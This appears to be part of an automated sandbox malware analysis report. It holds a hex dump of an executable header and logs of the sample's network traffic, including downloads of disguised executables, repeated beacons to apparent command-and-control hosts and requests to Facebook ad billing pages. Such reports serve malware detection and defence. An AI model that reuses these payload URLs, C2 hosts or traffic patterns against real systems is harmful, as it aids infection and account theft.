4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00
          Source: global trafficHTTP traffic detected: GET /systems/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: flytourchip.com.br
          Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /2701.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
          Source: global trafficHTTP traffic detected: GET /logo.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
          Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmxjpgcre.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: potunulit.org
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mxhagj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: potunulit.org
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://idkcje.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: potunulit.org
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxwvikrtgo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: potunulit.org
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://usbhmmnst.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: potunulit.org
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nqnoakwgow.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: potunulit.org
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://scuexnvs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: potunulit.org
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tmafbpv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: potunulit.org
          Source: global trafficHTTP traffic detected: GET /llpb1133.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.73.134.27
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fjgurrg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: potunulit.org
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yxysrc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: potunulit.org
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vrtsdpwuux.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: potunulit.org
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://saeqmrs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: potunulit.org
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://auuuhpc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: potunulit.org
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpniggi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: potunulit.org
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxqslbplw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: potunulit.org
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fixgfsjkdd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: potunulit.org
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mhfgwrr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: potunulit.org
          Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70Host: iueg.aappatey.com
          Source: global trafficHTTP traffic detected: POST /check/?sid=286587&key=075ea35c9751668450c9ec4c0067c0f6 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70Content-Length: 256Host: siaoheg.aappatey.com
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://esvui.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: perficut.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xacanotyi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: perficut.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://coaqka.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: perficut.at
          Source: Joe Sandbox ViewASN Name: GPRS-ASZAINKW GPRS-ASZAINKW
          Source: Joe Sandbox ViewIP Address: 37.34.248.24 37.34.248.24
          Source: Joe Sandbox ViewIP Address: 37.34.248.24 37.34.248.24
          Source: unknownNetwork traffic detected: IP country count 10
          Source: D8D3.exe, 00000013.00000003.518125370.0000000000885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/
          Source: D8D3.exe, 00000013.00000003.514324898.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511748500.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604
          Source: D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e6044
          Source: D8D3.exe, 00000013.00000003.514324898.0000000000843000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000843000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604n
          Source: D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604o
          Source: D8D3.exe, 00000013.00000003.441885976.000000000085F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/_
